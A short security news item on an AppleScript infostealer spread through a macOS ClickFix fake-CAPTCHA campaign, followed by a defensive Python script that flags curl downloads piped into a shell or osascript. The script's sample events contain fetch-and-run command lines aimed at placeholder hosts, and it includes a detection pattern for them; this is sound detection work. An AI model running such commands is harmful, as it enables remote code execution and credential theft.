
AppleScript infostealer deployed in new macOS ClickFix campaign

Multiple web browsers, browser extensions, and cryptocurrency wallets could have their stored credentials and live session cookies compromised by a new AppleScript-based information-stealing malware spread in a macOS-targeted ClickFix campaign, reports The Register.

Once it detects a desktop environment, the malware diverts the visitor to a counterfeit CAPTCHA page that verifies the desktop OS and checks for macOS-specific strings before instructing the user to paste a curl command, presented as a "verification code", into Spotlight's search field, according to a Netskope Threat Labs analysis. Running the command silently loads a malicious script that steals the username, carries a hardcoded command-and-control server address, and creates a temporary directory. Either macOS Tahoe 26.4 or macOS Sequoia blocks the intrusion, but older macOS versions let the malware proceed with credential harvesting.

Aside from siphoning various user data, the AppleScript infostealer also exfiltrates extensive data from a dozen Chromium-based browsers, Mozilla Firefox, and the Firefox-based Waterfox browser, as well as from 16 standalone crypto wallet apps and over 200 browser extensions. Netskope researcher Jan Michael Alcantara noted that the campaign is unrelated to APT38's recent social engineering operation targeting macOS users' credentials and crypto wallets.
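As an added defender-side example (not from the article or from Netskope's analysis), the script below scores constructed process-execution events for the behaviour described above: a curl download piped straight into a shell or osascript, weighted higher when the parent process is Spotlight. The event format, field names and sample values are assumptions, not data from the campaign.

```python
import re
from typing import Iterable

# Constructed sample process-execution events; field names are an assumed
# generic EDR export layout and the URLs are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"user": "alice", "parent": "Spotlight",
     "cmdline": "curl -fsSL http://example.invalid/verify | bash"},
    {"user": "bob", "parent": "Terminal",
     "cmdline": "curl -sSL https://example.com/file.tar.gz -o file.tar.gz"},
    {"user": "carol", "parent": "zsh",
     "cmdline": "osascript -e 'display dialog \"hi\"'"},
    {"user": "dave", "parent": "Spotlight", "cmdline": "open -a Safari"},
    {"user": "erin", "parent": "bash",
     "cmdline": "curl -s http://example.invalid/a.scpt | osascript"},
]

# curl output handed directly to sh/bash/zsh or to osascript (AppleScript).
DOWNLOAD_TO_INTERPRETER = re.compile(
    r"\bcurl\b.*\|\s*(ba|z|)sh\b|\bcurl\b.*\|\s*osascript\b")
# Parent names under which a pasted "verification code" would surface.
SPOTLIGHT_PARENTS = {"Spotlight", "com.apple.Spotlight"}


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one event; higher is more suspicious."""
    reasons = []
    cmd = event.get("cmdline", "")
    if DOWNLOAD_TO_INTERPRETER.search(cmd):
        reasons.append("curl output piped to shell/osascript")
    if event.get("parent") in SPOTLIGHT_PARENTS and "curl" in cmd:
        reasons.append("curl launched from Spotlight")
    return len(reasons), reasons


def find_clickfix_candidates(events: Iterable[dict], min_score: int = 1):
    """Collect (user, score, reasons) for events reaching min_score, for triage."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= min_score:
            hits.append((event.get("user", "?"), score, reasons))
    return hits


if __name__ == "__main__":
    for user, score, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"{user}: score={score} {'; '.join(reasons)}")
```

A plain `curl -o file` download (bob) scores zero, so the rule keys on the pipe into an interpreter rather than on curl itself.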
